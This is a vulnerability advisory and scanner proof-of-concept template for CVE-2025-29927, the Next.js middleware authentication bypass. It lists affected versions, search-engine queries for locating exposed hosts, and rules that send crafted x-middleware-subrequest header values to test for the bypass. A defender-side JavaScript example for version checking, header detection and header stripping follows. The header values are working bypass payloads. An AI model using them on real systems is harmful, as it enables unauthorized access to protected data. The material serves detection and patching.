Vulnerability description
The vulnerability stems from a flaw in how Next.js uses middleware for authentication and authorization: an attacker can manipulate the x-middleware-subrequest request header to bypass middleware-based security controls, potentially gaining unauthorized access to protected resources and sensitive data.
fofa: app="NEXT.JS"
hunter: app.name="Next.js"
id: CVE-2025-29927
info:
  name: Next.js Middleware鉴权绕过漏洞
  author: Y3y1ng
  severity: critical
  verified: true
  description: |-
    该漏洞源于Next.js使用中间件进行身份验证和授权的过程存在漏洞,该漏洞允许攻击者通过操作 x-middleware-subrequest 请求头来绕过基于中间件的安全控制,从而可能获得对受保护资源和敏感数据的未授权访问。
    fofa: app="NEXT.JS"
    hunter: app.name="Next.js"
  effected: |-
    15.* <= Next.js <15.2.3
    14.* <= Next.js <14.2.25
    11.1.4 <= Next.js <= 13.5.6
  references:
    - https://mp.weixin.qq.com/s/5R6WlX8J82braaMkAmisww
    - https://github.com/vulhub/vulhub/blob/fd7a2b9f15f101089065221d8752000b5e34eaaf/next.js/CVE-2025-29927/README.zh-cn.md
    - https://github.com/Threekiii/Awesome-POC/blob/17ecc4765fa9a26052250bfe0d9db6ff7d354e97/%E4%B8%AD%E9%97%B4%E4%BB%B6%E6%BC%8F%E6%B4%9E/Next.js%20%E4%B8%AD%E9%97%B4%E4%BB%B6%E9%89%B4%E6%9D%83%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2025-29927.md
  tags: cve,cve2025,nextjs,unauthorized
  created: 2025/04/07
rules:
  r0:
    request:
      method: GET
      path: /
    expression: response.status == 307 || response.status == 308
  r1:
    request:
      method: GET
      path: /
      headers:
        x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
    expression: response.status == 200
  r2:
    request:
      method: GET
      path: /
      headers:
        x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware
    expression: response.status == 200
  r3:
    request:
      method: GET
      path: /
      headers:
        x-middleware-subrequest: src/middleware
    expression: response.status == 200
  r4:
    request:
      method: GET
      path: /
      headers:
        x-middleware-subrequest: middleware
    expression: response.status == 200
  r5:
    request:
      method: GET
      path: /
      headers:
        x-middleware-subrequest: pages/_middleware
    expression: response.status == 200
expression: r0() && (r1() || r2() || r3() || r4() || r5())
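The template above only tells a scanner whether a host is exposed. The following is an added defender-side example (not part of the POC template or of Next.js itself) that turns the same facts into checks a team can run: a version test against the affected ranges listed under `effected`, a classifier that flags the header the rules send when it arrives on an external request, and a header sanitizer for a reverse proxy. The function names and the constructed header set are this example's own assumptions.

```javascript
// Added defender-side example; not part of the POC template above.
// HEADER is the header the template's rules send; AFFECTED mirrors the
// template's "effected" block. The function names are this example's own.
const HEADER = "x-middleware-subrequest";
const AFFECTED = [
  { min: "15.0.0", max: "15.2.3", inclusive: false }, // 15.* <= v < 15.2.3
  { min: "14.0.0", max: "14.2.25", inclusive: false }, // 14.* <= v < 14.2.25
  { min: "11.1.4", max: "13.5.6", inclusive: true }, // 11.1.4 <= v <= 13.5.6
];

function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  if (!m) throw new Error(`unparseable Next.js version: ${v}`);
  return m.slice(1, 4).map(Number);
}

function cmp(a, b) {
  for (let i = 0; i < 3; i++) if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  return 0;
}

// True when a Next.js version falls inside one of the listed ranges.
function isAffectedVersion(version) {
  const p = parseVersion(version);
  return AFFECTED.some(({ min, max, inclusive }) => {
    const hi = cmp(p, parseVersion(max));
    return cmp(p, parseVersion(min)) >= 0 && (inclusive ? hi <= 0 : hi < 0);
  });
}

// Next.js sets this header only on its own internal subrequests, so seeing it on
// a request from the internet is the signal; rules r1/r2 repeat the middleware name.
function inspectHeaders(headers) {
  const key = Object.keys(headers).find(k => k.toLowerCase() === HEADER);
  if (key === undefined) return { suspicious: false, reason: null };
  const segments = String(headers[key]).split(":");
  const allMiddleware = segments.every(s => /middleware$/i.test(s));
  return {
    suspicious: true,
    reason: allMiddleware
      ? `${HEADER} names middleware ${segments.length} time(s)`
      : `${HEADER} present on external request`,
  };
}

// Interim mitigation at a reverse proxy: drop the header before forwarding upstream.
function sanitizeHeaders(headers) {
  const out = {};
  for (const [k, v] of Object.entries(headers)) if (k.toLowerCase() !== HEADER) out[k] = v;
  return out;
}
```

Run `inspectHeaders` on the raw header map your edge logs or proxy hands you; a `suspicious: true` result on an internet-facing request is worth an alert regardless of the Next.js version behind it.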